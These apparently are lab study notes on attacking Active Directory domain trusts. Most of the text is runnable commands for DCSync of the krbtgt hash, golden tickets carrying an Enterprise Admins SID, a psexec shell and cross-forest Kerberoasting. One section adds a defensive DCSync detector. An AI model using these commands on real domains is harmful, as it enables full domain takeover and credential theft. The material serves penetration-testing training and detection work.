# Domain Trust Enumeration

## Enumerate Domain Trusts (PowerView)

### Show Existing Trusts

```powershell
Get-DomainTrust
```

### Show Trust Mapping

```powershell
Get-DomainTrustMapping
```

### Show Users in the Child Domain

```powershell
Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName
```

## Attacking Domain Trusts - Child -> Parent (Windows)

To perform this attack after compromising a child domain, we need the following:

1. The KRBTGT hash for the child domain.
2. The SID for the child domain.
3. The name of a target user in the child domain (does not need to exist!).
4. The FQDN of the child domain.
5. The SID of the Enterprise Admins group of the root domain.

With this data collected, the attack can be performed with Mimikatz or Rubeus.

### 1 Obtaining KRBTGT NT Hash

```powershell
mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt
```

### 2 Obtaining SID Child Domain

```powershell
Get-DomainSID
```

### 3 Name Target User

```powershell
# Can be a fake username (the account does not need to exist)
```

### 4 FQDN Child Domain

```powershell
Get-DomainTrust
```

### 5 SID Enterprise Admins Group

```powershell
Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid
```

### 6 Putting It All Together

```powershell
# Mimikatz Way
kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt

# Rubeus Way
.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt
```

### 7 Confirm Ticket

```powershell
# List Tickets
klist
```

### 8 DCsync

```powershell
# Mimikatz
lsadump::dcsync
```

## Attacking Domain Trusts - Child -> Parent (Linux)

We can also perform the attack shown in the previous section from a Linux attack host. To do so, we'll still need to gather the same bits of information:

1. The KRBTGT hash for the child domain
2. The SID for the child domain
3. The name of a target user in the child domain (does not need to exist!)
4. The FQDN of the child domain
5. The SID of the Enterprise Admins group of the root domain

#### 1 Get KRBTGT NT Hash

```bash
secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt
```

#### 2 Get SID Child Domain

```bash
lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 | grep "Domain SID"
```

#### 3 Name Target User

```bash
# Can be any name (the account does not need to exist)
```

#### 4 Get SID Enterprise Admins

```bash
# The Enterprise Admins SID is the root domain SID plus RID 519; -B12 keeps the preceding lines so the "Domain SID" line is visible
lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 "Enterprise Admins"
```

#### 5 Putting it all Together

```bash
ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker
```

#### 6 Export ccache

```bash
export KRB5CCNAME=hacker.ccache
```

#### 7 Get Shell

```bash
psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5
```

### Automatic Way

```bash
raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm
```
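Both the Windows (`lsadump::dcsync`) and Linux (`secretsdump.py`) procedures above begin by replicating the child domain's krbtgt secret, which a domain controller records as event 4662 carrying the directory replication control-access rights in its Properties field. The following is an added example, not part of the original notes or of any HTB material: a minimal detection that parses exported 4662 records and flags replication requests from any principal outside an assumed allowlist of DC computer accounts. The event records, the `make_4662` helper and the `KNOWN_DCS` allowlist are constructed for the example; the right GUIDs are the well-known AD extended-right values.

```python
import xml.etree.ElementTree as ET
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
# Well-known AD extended-right GUIDs that a replication (DCSync-style) request exercises.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

def parse_event(xml_text):
    """Return (EventID, {EventData name: value}) from one exported Windows event XML record."""
    root = ET.fromstring(xml_text)
    event_id = int(root.find("e:System/e:EventID", NS).text)
    data = {d.get("Name"): (d.text or "").strip() for d in root.findall("e:EventData/e:Data", NS)}
    return event_id, data

def replication_rights_used(properties):
    """Map the GUIDs in a 4662 'Properties' field to the replication rights they represent."""
    guids = {tok.strip("{}").lower() for tok in properties.split()}
    return sorted(REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS)

def find_dcsync(records, dc_accounts):
    """Alert on 4662 events that exercise replication rights from a principal not in dc_accounts."""
    alerts = []
    for xml_text in records:
        event_id, data = parse_event(xml_text)
        if event_id != 4662:
            continue
        rights = replication_rights_used(data.get("Properties", ""))
        if rights and data.get("SubjectUserName", "").upper() not in dc_accounts:
            subject = f"{data.get('SubjectDomainName')}\\{data.get('SubjectUserName')}"
            alerts.append({"subject": subject, "rights": rights})
    return alerts

def make_4662(domain, user, guid):
    """Constructed 4662 record in the Windows event XML shape (control access on the domain object)."""
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>4662</EventID></System><EventData>'
            f'<Data Name="SubjectUserName">{user}</Data><Data Name="SubjectDomainName">{domain}</Data>'
            f'<Data Name="Properties">%%7688\n\t{{{guid}}}\n\t{{19195a5b-6da0-11d0-afd3-00c04fd930c9}}</Data>'
            f'</EventData></Event>')
# Constructed samples: a replication request by a user account (as on this page) and one by an assumed DC.
SAMPLE_EVENTS = [
    make_4662("LOGISTICS", "htb-student_adm", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"),
    make_4662("INLANEFREIGHT", "ACADEMY-EA-DC01$", "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"),
]
KNOWN_DCS = {"ACADEMY-EA-DC01$"}  # assumed allowlist of domain controller computer accounts

if __name__ == "__main__":
    for alert in find_dcsync(SAMPLE_EVENTS, KNOWN_DCS):
        print(f"DCSync-like replication by {alert['subject']}: {', '.join(alert['rights'])}")
```

On a real DC, 4662 is only written when Directory Service Access auditing is enabled, and the allowlist must also cover legitimate non-DC replicators such as an Azure AD Connect service account.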

## Attacking Domain Trust - Cross-Forest (Windows)

### Cross-Forest Kerberoasting

```powershell
# Enumerate Cross Forest Users with SPN
Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName

# Rubeus /Domain flag
.\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap
```

### Admin Password Reuse & Group Membership

```powershell
# Check Foreign Groups
Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL

# Convert SID
Convert-SidToName <SID>

# Login, if we are part of the administrators group
Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator
```

### SID History Abuse

## Attacking Domain Trusts - Cross-Forest Trust Abuse (Linux)

### Cross-Forest Kerberoasting

```bash
# Using -target-domain
GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
```
